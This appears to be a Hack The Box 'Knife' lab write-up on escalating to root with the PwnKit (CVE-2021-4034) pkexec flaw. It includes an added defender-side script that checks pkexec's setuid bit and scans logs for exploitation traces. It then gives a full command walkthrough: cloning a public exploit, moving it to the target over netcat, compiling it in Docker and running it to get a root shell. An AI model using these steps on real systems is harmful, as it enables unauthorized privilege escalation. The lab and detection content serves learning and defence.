CVE-2021-4034


PEAS flagged the target system as vulnerable to CVE-2021-4034.

The vulnerable program is part of Polkit, which manages process privileges. Polkit's pkexec lets non-privileged processes communicate with privileged ones and provides a controlled, authorized way to run commands with elevated privileges, similar to sudo.

A memory-corruption flaw is triggered when pkexec is executed with no arguments (an empty argument list). By manipulating environment variables, an attacker can make pkexec load and execute arbitrary code with superuser privileges.
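From the defender's side, the two things worth checking on a host are whether pkexec still carries the setuid bit (the interim vendor workaround was to strip it with chmod 0755 until a fixed polkit package is installed) and whether the auth log contains the messages pkexec emits when the environment-variable injection is attempted. The script below is an added example, not part of the original writeup; it assumes pkexec lives at /usr/bin/pkexec (overridable via the first argument) and the log lines it scans are constructed samples.

```shell
#!/bin/sh
# Defender-side triage for CVE-2021-4034 (PwnKit). Added example, not from the writeup.
# Assumes pkexec is at /usr/bin/pkexec unless a path is given as the first argument.

# Report whether a pkexec binary is present and still setuid.
# Output: "missing", "setuid" or "not-setuid".
pkexec_setuid_state() {
    p="${1:-/usr/bin/pkexec}"
    if [ ! -e "$p" ]; then
        echo missing
    elif [ -u "$p" ]; then
        echo setuid
    else
        echo not-setuid
    fi
}

# Count log lines matching the messages pkexec writes when the injected
# environment is rejected (documented in the Qualys advisory). Zero hits does
# not prove the host is clean: the technique can be run without these traces.
pwnkit_log_hits() {
    [ -r "$1" ] || { echo 0; return 0; }
    grep -cE 'SHELL variable was not found.*/etc/shells|contains suspicious content' "$1" || true
}

# Write a constructed auth.log sample (two pkexec indicators, one unrelated sshd line).
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
Jan 26 10:01:02 host pkexec[1234]: james: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/dev/shm] [COMMAND=]
Jan 26 10:01:05 host pkexec[1240]: james: The value for environment variable [XAUTHORITY] contains suspicious content [USER=root] [TTY=unknown] [CWD=/dev/shm] [COMMAND=]
Jan 26 10:02:00 host sshd[900]: Accepted publickey for james from 10.10.14.2 port 51000 ssh2
EOF
    echo "$f"
}

state=$(pkexec_setuid_state "$1")
echo "pkexec state: $state"
[ "$state" = "setuid" ] && echo "still exposed if polkit is unpatched; workaround: chmod 0755 pkexec"
log=$(make_sample_log)
echo "PwnKit indicators in sample log: $(pwnkit_log_hits "$log")"
rm -f "$log"
```

Point pwnkit_log_hits at the real /var/log/auth.log (or the journal exported to a file) to run the same check on a live host.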

Exploit (PwnKit)


I found an exploit online

┌──(kali㉿kali)-[~/archive/htb/labs/knife]
└─$ git clone https://github.com/berdav/CVE-2021-4034.git ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Receiving objects: 100% (92/92), 22.71 KiB | 4.54 MiB/s, done.
Resolving deltas: 100% (44/44), done.

I copied the exploit repo to Kali and packaged it up for delivery

Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/knife]
└─$ nc $IP 2222 < CVE-2021-4034.tar.gz
 
james@knife:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on 0.0.0.0 2222
Connection received on 10.10.14.2 36410
james@knife:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete

james@knife:/dev/shm/CVE-2021-4034$ make
make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc: fatal error: cannot execute ‘cc1’: execvp: No such file or directory
compilation terminated.
make: *** [Makefile:21: pwnkit.so] Error 1

Compilation fails. It seems that the installed cc has issues with either the library, or the compiler itself might be corrupted. Nevertheless, I would need to compile the exploit remotely.

Docker Exploit Development


┌──(kali㉿kali)-[~/archive/htb/labs/knife]
└─$ docker run -it --entrypoint "/bin/bash" --name knife ubuntu:20.04
root@d38364305d8f:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git

Setting up the environment

root@d38364305d8f:/# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034 ; make ; cd .. ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Unpacking objects: 100% (92/92), 22.69 KiB | 1.42 MiB/s, done.
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.

One-liner for all of it

Success


root@d38364305d8f:/# nc 10.10.10.242 2222 < CVE-2021-4034.tar.gz 
 
james@knife:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on 0.0.0.0 2222
Connection received on 10.10.14.2 43254
james@knife:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete

james@knife:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
knife
# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.242  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:747b  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:747b  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:74:7b  txqueuelen 1000  (Ethernet)
        RX packets 1069059  bytes 190004928 (190.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1097876  bytes 409563070 (409.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 3707691  bytes 422263628 (422.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3707691  bytes 422263628 (422.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise